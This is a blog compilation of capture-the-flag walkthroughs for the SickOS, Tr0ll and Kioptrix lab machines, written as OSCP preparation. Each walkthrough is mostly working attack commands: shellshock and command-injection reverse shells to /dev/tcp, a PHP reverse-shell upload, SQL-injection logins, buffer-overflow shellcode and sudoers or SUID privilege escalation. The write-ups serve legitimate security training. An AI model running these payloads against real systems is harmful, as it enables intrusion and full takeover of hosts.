nmap – tuonilabs

SickOS Write-Up

What follows is a write-up of two vulnerable machines, SickOS 1.1 and SickOS 1.2.

SickOS was inspired by the OSCP labs.

The goal is simple: compromise the system and get root.

[*] STATUS: COMPLETED

SickOS 1.1 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
”’
Note the following ports and services are up and running:
ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy

Time to do some research.
”’

2) Start Metasploit -> search squid
3) use auxiliary/scanner/http/squid_pivot_scanning -> show options
4) set RANGE 192.168.189.208 -> set RHOSTS 192.168.189.208 -> set RPORT 3128
5) exploit
# We can navigate to port 80 under a proxy using port 3128

6) nikto -h 192.168.189.208 -useproxy 192.168.189.208:3128
”’
Checking for vulnerabilities; the shellshock vulnerability might be our way in

+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the ‘shellshock’ vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271)
”’

7) Open Burp Proxy with Intercept On
8) In Burp: User options -> Upstream Proxy Servers
Destination host: 192.168.189.208
Proxy host: 192.168.189.208
Proxy port: 3128

9) Browse to: 192.168.189.208/cgi-bin/status
10) Modify User-Agent with: () { :;}; /bin/bash -i >& /dev/tcp/192.168.189.130/443 0>&1
# Wait a bit, it takes a while

11) cd /var/www
12) file wolfcms -> cd wolfcms -> ls -> cat config.php
”’
Notice the MySQL credentials:
define(‘DB_DSN’, ‘mysql:dbname=wolf;host=localhost;port=3306’);
define(‘DB_USER’, ‘root’);
define(‘DB_PASS’, ‘john@123’);
define(‘TABLE_PREFIX’, ”);
”’

13) su sickos
# We get an error: su: must be run from a terminal

14) echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py
15) python /tmp/asdf.py
16) su sickos -> password: john@123
17) sudo -s -> password: john@123
18) cd /root
19) ls
20) cat a0216ea4d51874464078c618298b1367.txt

Flag: a0216ea4d51874464078c618298b1367
End-Notes:

Initially I had logged into the wolf cms service with admin:admin, however, it was taking too long to load pages, so I decided to go another way. That might be another method to compromise the system.

SickOS 1.2 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
”’
Note the following ports and services are up and running:
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http lighttpd 1.4.28

Time to get to work.
”’

2) nikto -h 192.168.189.218
3) wfuzz –hc 404 -c -z file,/usr/share/wfuzz/wordlist/general/big.txt http://192.168.189.218/FUZZ
# “test” and “~” return results

4) Browse to: http://192.168.189.218/test/
5) Start Burp Proxy with Intercept On
6) Refresh the page -> Change the GET request to OPTIONS -> Right-click -> Do Intercept -> Response to this request
# Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK

7) Search for: php reverse shell code
8) wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
9) gedit php-reverse-shell.php
# Adjust IP and port accordingly

10) nc -nlvp 443
11) curl –upload-file php-reverse-shell.php -v -url http://192.168.189.218/test/php-reverse-shell.php -0 –http1.0

12) Refresh the page and click on the file we just uploaded
13) ps aux | grep root
# Checking which services are running as root
14) ls -al /etc/cron*
# Checking which jobs are scheduled

15) Search for: chkrootkit vulnerability
16) Read: https://www.exploit-db.com/exploits/33899/
”’
Steps to reproduce:

– Put an executable file named ‘update’ with non-root owner in /tmp (not
mounted noexec, obviously)
– Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
”’

17) python -c ‘import pty ; pty.spawn(“/bin/bash”)’
# Getting a proper shell

Method A: To get root (slow)
18) echo ‘chmod 777 /etc/sudoers && echo “www-data ALL=NOPASSWD: ALL” >> /etc/sudoers && chmod 440 /etc/sudoers’ > /tmp/update
# Giving ourselves sudo power
# In theory this should work, but it was taking too long, so I went with Method B
Method B: To get root (fast)
18) cd /tmp/
19) cat << EOF >> root.c
int main(void)
{
setgid(0);
setuid(0);
execl(“/bin/sh”, “sh”, 0);
}
EOF

20) gcc -o root root.c
# Now we have to make ‘update’ interact with this executable

21) cat << EOF > update
#!/bin/bash
chown root /tmp/root
chgrp root /tmp/root
chmod u+s /tmp/root
EOF

22) chmod +x update
23) ls -al
# We’re ready to go
24) ./root
25) whoami
# We got root
26) cd /root
27) ls
28) cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt

Flag: 7d03aaa2bf93d80040f3f22ec6ad9d5a
End-Notes:
Very cool box. Note that for the chkrootkit exploit you could have also used Metasploit.

This was the last box I had as training for the OSCP labs. I first completed Kioptrix (1-5), then Tr0ll (1-2), and finally the two sickOS boxes. I’m signing up for the OSCP labs this week and aim to be OSCP certified within 90 days or less.

Tr0ll Write-Up

What follows is a write-up of two vulnerable machines, Tr0ll 1 and Tr0ll 2.

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs.

The goal is simple, gain root and get Proof.txt from the /root directory.

[*] STATUS: COMPLETED

Tr0ll 1 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
”’
Note the following ports and services are up and running:
ftp vsftpd 3.0.2
ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.4.7 ((Ubuntu))

”’

2) nikto -h 192.168.189.197
# It found a ‘/secret/’ directory mentioned in robots.txt which might be interesting
3) Browse to: 192.168.189.197
# Got trolled. Nice one.
# Let’s try attacking through ftp

4) ftp 192.168.189.197 -> anonymous:anonymous
# We’re in
5) ls -> get lol.pcap -> exit
6) strings lol.pcap
# Note: you almost found the sup3rs3cr3tdirlol 😛
7) Browse to: http://192.168.189.197/sup3rs3cr3tdirlol/
8) Download the binary
9) strings roflmao
# Note: Find address 0x0856BF to proceed
10) Browse to: http://192.168.189.197/0x0856BF/
11) Click on ‘good_luck’ -> which_one_lol.txt
12) wget http://192.168.189.197/0x0856BF/good_luck/which_one_lol.txt
12) Click on ‘this_folder_contains_the_password/’ -> Pass.txt
# Note: Either ‘Pass.txt’ or its contents ‘Good_job_:)’ could be the password
13) medusa -U which_one_lol.txt -p Pass.txt -h 192.168.189.197 -M ssh
# We found our way in
14) ssh overflow@192.168.189.197 -> Pass: Pass.txt
# We’re in
15) cat root/Proof.txt
# Permission denied, we’re going to have to do privilege escalation
16) find / -perm -o+w
# Searching for world writable files
# That /lib/log/cleaner.py file near the end looks interesting
17) vi /lib/log/cleaner.py
Modify the try:
os.system(‘usermod -aG sudo overflow’)

# Initially the modification didn’t seem to work, but by the third log on
# (it kept kicking us out) we finally became a sudoer
18) id
# Became a sudoer
19) sudo ls /root
20) sudo cat /root/proof.txt
# Got the flag

Flag: 702a8c18d29c6f3ca0d99ef5712bfbdc

End-Notes:
Pretty funny box, though slightly annoying when it kept logging us out. Fun overall.

Tr0ll 2 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.189.0/24
”’
Note the following ports and services are up and running:
ftp vsftpd 2.0.8 or later
ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
http Apache httpd 2.2.22 ((Ubuntu))

Also notice that there were two network adapters. Perhaps some chaining?

”’

2) Browse to: 192.168.189.204
3) nikto -h 192.168.189.204
”’
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15.

”’

4) wfuzz –hc 404 -c -z file,/usr/share/wfuzz/wordlist/general/big.txt http://192.168.189.204/FUZZ
# Fuzzing for directories – only index came up

5) Browse to: http://192.168.189.204/robots.txt

6) wfuzz –hc 404 -c -z file,/root/Documents/wargames/tr0ll/list.txt http://192.168.189.204/FUZZ

”’
Out of all the URLs only the following seem to work:
http://192.168.189.204/noob/
http://192.168.189.204/keep_trying/
http://192.168.189.204/dont_bother/
http://192.168.189.204/ok_this_is_it/

The filename of the images is: cat_the_troll
”’

7) Download all the images
8) tail -n 1 cat_the_troll.jpg cat_the_troll.jpg.1 cat_the_troll.jpg.2 cat_the_troll.jpg.3
# Notice on the third image (dont_bother) we get:
# Look Deep within y0ur_self for the answer

9) Browse to: http://192.168.189.204/y0ur_self/
10) wget http://192.168.189.204/y0ur_self/answer.txt
11) cat answer.txt | base64 -d > the_answer.txt
12) gedit the_answer.txt
# It’s a bunch of repeated words
13) uniq -u the_answer.txt > answerz.txt
14) gedit answerz.txt
# Notice the following string: ItCantReallyBeThisEasyRightLOL
# After trying it on the web app, ftp, and ssh, I decided to move on
15) ftp 192.168.189.204 -> Tr0ll:Tr0ll
# It was this easy

16) ls -> get lmao.zip -> exit
17) unzip lmao.zip
# It’s password encrypted
# The password is: ItCantReallyBeThisEasyRightLOL

18) file noob
# noob: PEM RSA private key
# This might very well be to log in via ssh

19) ssh noob@192.168.189.204 -i noob
# It prints out “TRY HARDER LOL!” and closes the connection
# Looks like it’s forcing this command (echo) to be run once we log in

20) Search for ‘ssh exploit’
21) Read: http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
# We can use the shellshock exploit to run other commands

22) ssh noob@192.168.189.204 -i noob ‘() { :;}; /bin/bash’
23) id
# We’re in
24) pwd -> cd ../ -> ls -> ls tr0ll
# There’s a lmao.zip
25) cd / -> ls -> ls nothing_to_see_here -> ls nothing_to_see_here/choose_wisely
26) cd nothing_to_see_here/choose_wisely
27) ls door1 -> ls door2 -> ls door3
28) file door1/r00t -> file door2/r00t -> file door3/r00t
”’
After running all three files, we get the following:
– door1 r00t lets us input data
– door2 prints:
Good job, stand by, executing root shell…
BUHAHAHA NOOB!

– door3 r00t prints: 2 MINUTE HARD MODE LOL, and then bricks the system

Let’s go with door1. Binary exploitation?
”’

29) cd door1
30) gdb -q ./r00t
31) run $(python -c ‘print “A” * 500’)
# We get a segmentation fault
32) run $(python -c ‘print “A” * 300’)
33) run $(python -c ‘print “A” * 200’)
34) run $(python -c ‘print “A” * 250’)
35) run $(python -c ‘print “A” * 270’)
36) run $(python -c ‘print “A” * 268 + “B” * 4’)
# We control EIP

37) disas main
38) br *main+97
# Setting a breakpoint at leave
39) run $(python -c ‘print “A” * 268 + “B” * 4′)
40) x/100x $esp
”’
Notice where our A’s start
We can now load and run our shellcode

Let’s use execve /bin/sh shellcode I wrote, which is 25 bytes in size
”’

41) run $(python -c ‘print “A” * 268 + “\x80\xfb\xff\xbf” + “\x90” * 20 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘)
# Confirming it works

42) ./r00t $(python -c ‘print “A” * 268 + “\x80\xfb\xff\xbf” + “\x90” * 20 + “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80″‘)

43) whoami
44) cat /root/Proof.txt
# Got the flag

Flag: a70354f0258dcc00292c72aab3c8b1e4

End-Notes:
Fun box!

Index

This is a sticky post. Below you can find links to all of my write-ups.

Return Oriented Programming Series

Introduction
Setup
CTF and Wargames
Real-World Exploits

Web Exploitation

Binary Exploitation

Reverse Engineering

Capture the Flags

General Network Exploitation

Offensive Security Certified Professional (OSCP) Journey

Programs:

I will keep updating this post, adding more links as I add more write-ups.

Kioptrix Write-Up

What follows is a write-up of several vulnerable machines, Kioptrix #1 through #5.

The object of the game is to acquire root access via any means possible.
The purpose of the games is to practice techniques in vulnerability assessment and exploitation. There are multiple ways to get root access and compromise the system.

These machines are run in a host-only setup, as they are full of vulnerabilities and internet access would be dangerous.

[*] STATUS: COMPLETED

Kioptrix 1 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
”’
Scan for address and open ports

Note the following two services:
Samba smbd
Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

These two could be our way in
”’

2) enum4linux 192.168.189.185
# Note: Server=[Samba 2.2.1a]
3) nikto -h 192.168.189.185
# We find a lot of vulnerabilities

4) Search Google for: Samba 2.2.1 exploit
# The first result is a verified remote execution exploit
5) wget https://www.exploit-db.com/download/10
6) mv 10 samba_228_remote.c
7) gcc -o samba_228_remote samba_228_remote.c
8) ./samba_228_remote
9) ./samba_228_remote -b 0 -c 192.168.189.130 192.168.189.185
10) whoami
# We got root
11) cat /var/mail/root
# We own this machine

Kioptrix 2 Write-Up

1) nmap -sS -sV -Pn 192.168.0.0/24
”’
Scan for address and open ports

Note the following three services:
Apache httpd 2.0.52 ((CentOS))
CUPS 1.1
MySQL (unauthorized)

These three could be our way in
”’

2) Browse to: 192.168.0.20
username: admin
password: ‘ or ‘1’=’1
# We’re in

3) ping localhost; ls
# The application is vulnerable to command injection

4) nc -n -v -l -p 443
5) In the browser: ping localhost; bash -i >& /dev/tcp/192.168.0.19/443 0>&1
6) id
# We got a shell, but not as a privileged user
7) Search: linux centos exploit
# The second result is for privilege escalation – just what we need

8) cd /tmp
9) wget https://www.exploit-db.com/download/9545 –no-check-certificate
10) mv 9545 centos_escalate.c
11) gcc -o centos_escalate centos_escalate.c
12) ./centos_escalate
13) whoami
# We got root

Kioptrix 3 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
2) gedit /etc/hosts
Add:
<ip> kioptrix3.com
192.168.189.195 kioptrix3.com

3) Browse to kioptrix3.com
4) Right-click -> View Page Source Code
# Notice the use of LotusCMS
5) Search: lotuscms exploit
# The third result is for eval() remote command execution
# Exploit: https://www.exploit-db.com/exploits/18565/
6) Start Metasploit
7) search LotusCMS
8) use exploit/multi/http/lcms_php_exec
9) options
10) set RHOST 192.168.189.195
11) set URI /
12) exploit
13) ls
# Remember they were talking about the gallery
# Let’s check it out
14) ls gallery
15) cat/gallery.gconfig.php
# Notice the credentials: root:fuckeyou
16) Browse to: http://kioptrix3.com/phpmyadmin/index.php -> Enter the above credentials
17) Gallery -> dev_accounts
# Note the hashes
17) Browse to: https://hashkiller.co.uk/md5-decrypter.aspx
Enter the hash: 5badcaf789d3d1d09794d8f021f40f0e
Result: starwars

18) ssh loneferret@192.168.189.195 -> Enter the password: starwars
19) cat CompanyPolicy.README
20) /usr/local/bin/ht
# I got an error: Error opening terminal: xterm-256color
# I solved it by entering: export TERM=xterm
21) /usr/local/bin/ht
22) Fn+F3 -> /etc/sudoers -> Enter
23) Under ‘User privilege specification’ add to loneferret: /bin/bash
24) sudo /bin/bash
25) whoami
# We got root
26) cd /root
27) cat Congrats.txt

Kioptrix 4 Write-Up

1) nmap -sS -sV -Pn 192.168.189.0/24
”’
Note the following services:
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
Samba smbd 3.X – 4.X (workgroup: WORKGROUP)

They could be our way in.

”’

2) enum4linux -a 192.168.189.196
”’
Note the users:
Account: nobody Name: nobody
Account: robert Name: ,,,
Account: root Name: root
Account: john Name: ,,,
loneferret Name: loneferret,,,

We can try using one of these accounts

”’

3) Browse to: 192.168.189.196
user: robert
pass: ‘ or ‘1’=’1

# Note the password: ADGAdsafdfwt4gadfga==
# Since ssh is also on and the web page isn’t showing much else, we can try that

4) ssh robert@192.168.189.196
5) ?
# Checking out what we can use

6) echo os.system(‘/bin/bash’)
7) ps aux | grep root
# Note that MySQL is running with root privileges
8) mysql
9) select sys_exec(“echo ‘robert ALL=(ALL) ALL’>> /etc/sudoers”);
# Adding “our” account to sudoers
10) exit
11) sudo bash
12) id
# We got root
13) cat /root/congrats.txt
Side-note:
Initially I also searched for “ubuntu 5.6 exploit” and thought of using the following exploit: https://www.exploit-db.com/papers/15311/

That might also be another way in.

Kioptrix 5 Write-Up

1) nmap -sS -sV -Pn -T4 192.168.0.0/24
”’
Note the following:
Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)

It’s open in both port 80 and port 8080.

”’

2) Browse to: 192.168.0.85
3) Right-click -> View Page Source Code
# Notice: URL=pChart2.1.3/index.php”
4) Browse to: http://192.168.0.85/pChart2.1.3/examples/index.php
5) Search: pChart2.1.3
6) Read: https://www.exploit-db.com/exploits/31173/
# Let’s try directory traversal
7) Browse to: 192.168.0.85/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
# The web app is vulnerable to directory traversal

8) Browse to: http://192.168.0.85/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

”’
Notice at the end of the file:

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2″>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

Apparently we can get in if we set the UserAgent to Mozilla 4

”’

9) Search: mozilla firefox 4.0 user agent string
10) Browse to: http://www.useragentstring.com/pages/useragentstring.php?name=Firefox
11) Ctrl-F -> mozilla/4.0 -> http://www.useragentstring.com/index.php?id=19040
12) In User Agent Switcher:
Edit User Agents
New
Description: Mozilla FireFox 4.0
User Agent:
Mozilla/4.0 (compatible; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8)

13) Browse to: http://192.168.0.85:8080/
14) Click on ‘phptax’
15) Open Metasploit -> search phptax -> use exploit/multi/http/phptax_exec
16) show options -> set RHOST 192.168.0.85 -> set RPORT 8080 -> exploit
17) id
18) uname -a
# Getting kernel details to figure out how to do privilege escalation

19) Search: FreeBSD 9.0 exploit
# The first result is what we’re looking for
# https://www.exploit-db.com/exploits/28718/

20) wget https://www.exploit-db.com/download/28718
# Downloading it to our machine
21) mv 28718 freeBSD9_priv_esc.c
22) nc -lvp 8888 < freeBSD9_priv_esc.c
# Hosting the exploit on our machine
# We will download the file from the limited shell

23) nc -nv 192.168.0.87 8888 > die.c
24) Stop nc
24) gcc die.c -o die
25) ./die
26) id
# We got root
27) cat /root/congrats.txt
28) cat /root/ossec-alerts.log
”’
For fun, check out how noisy we were during our attack
As the congrats.txt explains, figuring out how to approach and attack the target before actually attacking is extremely important. Otherwise you will make a lot of noise and get caught early on as a result.
”’

End-Notes:

Very fun machines to exploit. As the Kioptrix website clearly states, they are intended for beginners, hence they are easy to exploit to the seasoned security tester. A big thanks to loneferret for such fun yet educational challenges!